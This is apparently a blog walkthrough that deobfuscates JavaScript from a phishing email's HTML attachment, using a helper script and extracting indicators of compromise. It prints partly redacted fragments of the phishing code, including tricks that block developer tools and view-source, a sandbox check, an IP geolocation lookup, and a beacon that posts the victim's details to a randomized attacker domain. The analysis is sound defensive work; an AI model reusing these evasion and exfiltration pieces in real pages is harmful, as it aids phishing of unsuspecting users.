Deobfuscating Javascript in Phishing mails
My second posting how to deobfuscate some phsihing content.. let's go!
Phase 1: Got some phishing mails with encoded content:
FILENAME.pdf.htm
Output the content with dummy mail address!! and console.log(decryptedString);
Phase 2: More thing to deofuscate
We got now some HEX encoded stuff, we simply console.log it out again:
With console.log("var _0x99af=["\x51\x32\x46\x73\x62\x43..}};_0xb456x26()}}") we got following output:
We can see some &quot
So, we can replace these them with:
var SOCOUT = "var _0x99af=["Q2FsbC4wMDQuTWVXY...sb24=","onload","script&... ";
SOCOUT = SOCOUT.replaceAll('"', ' " ');Phase 3: String Array Mapping - Build some Helper Script
Now we can see two variables: first is the Array mapping and the secound the content for replacing some arrays. We need some helper scripts here:
/* -----
SCRIPT :
GNU nano 7.2 deobfuscate-01.js
------ */
var _0x99af=["Q2FsbC4wMDQuTWVXYXR0Z...sb24=","onload","script","createElement","src","https://code.jq..Found","Ctrl+U","add","keydown","target","string","getElementById","toLowerCase","event","disable_in_input","srcElement","nodeType","parentNode","INPUT","tagName","TEXTAREA","keyCode","which","fromCharCode",",",".","+","split","~","!","@","#","$","%","^","&","*","(",")","_",":",""","<",">","?","|","ctrlKey","shiftKey","altKey","metaKey","length","ctrl","control","shift","alt","meta","keycode","propagate","cancelBubble","returnValue","stopPropagation","preventDefault","all_shortcuts","type","addEventListener","attachEvent","on","callback","detachEvent","removeEventListener","Meta+Alt+U","Ctrl+Shift+I","Ctrl+Shift+J","Ctrl+Shift+C","Meta+C","contextmenu","onkeydown","location","https://microsoft.com","Hmmm ..","toString@","includes","stack","defineProperties","log","hostname","localhost","127.0.0.1","Don't run me here!","https://","slice","random","lopapscop.ws","kfak...op","https://pro.ip-api.com/jso...ntry","city","post","/obufsssssssscaaatoion/","Normal","ip","json","output","Allow_Online","Yes","http://","indexOf","hide","#loadingScreen","No","Both","show","#404_not_found","ajax","getJSON","gud","nr gud"];
console.log(_0x99af.length);
var ctext1 = "var IGOBZL=_0x99af[0];var cbbg=XDJhBBQX;window[_0x99af[1]]= function(){var _0xb456x3=document[_0x99af[3]](_0x99af[2]);_0xb456x3[_0x99af[4]]= _0x99af[5];document[_0x99af[8]](_0x99af[7])[0][_0x99af[6]](_0xb456x3);var _0xb456x4=document[_0x99af[3]](_0x99af[2]);..._0xb456x23=(_0xb456x24)=>{return new Promise((_0xb456x25)=>setTimeout(_0xb456x25,_0xb456x24))};const _0xb456x26=async ()=>{while(_0xb456x22){try{_0xb456x1b();console[_0x99af[106]](_0x99af[138]);_0xb456x22= false}catch(err){console[_0x99af[106]](_0x99af[139]);let _0xb456x27= await _0xb456x23(1000)}}};_0xb456x26()}}";
function dobfuscater(ctext) {
//let array = string.split('')
for (let i = 0; i < _0x99af.length; i++) {
ctext = ctext.replaceAll('[_0x99af['+i+']]','.'+ _0x99af[i]);
ctext = ctext.replaceAll('_0x99af['+i+']', _0x99af[i]);
console.log("Get line: ("+i+") OBFS Code => "+_0x99af[i]);
//ctext2 = tmp
}
ctext = ctext.replaceAll('&','&');
// Convert fromHTMLentity() => ...
//const regex = /\[([a-z]+\])?/ig;
//ctext = ctext.replaceAll(regex,'-');
return ctext;
}
let ct_f = dobfuscater(ctext1);
console.log("\nGet Final Output:\n---------------\n\n"+ct_f);
var IGOBZL="Q2FsbC4wMDQxsb24=";
var kaka90nal="https://"+Math.random().toString(36).slice(2,20)+"."+"lopapXXX.ws";
var ka45k459final2="https://"+Math.random().toString(36).slice(2,20)+"."+"kfak...op";
var kak0011afinal= kaka90nal;
console.log("\n\nIOC\'s:\n\n"+kak0011afinal+"/obufsssssssscaaatoion/,data:{'PageType':Normal,'NAMEOFTHEGUY':"+atob(IGOBZL)+",'ip':_0xb456x1d.ip,'city':_0xb456x1d.city,'country':_0xb456x1d.country");
We got somthing like that - Call MeWattermellon
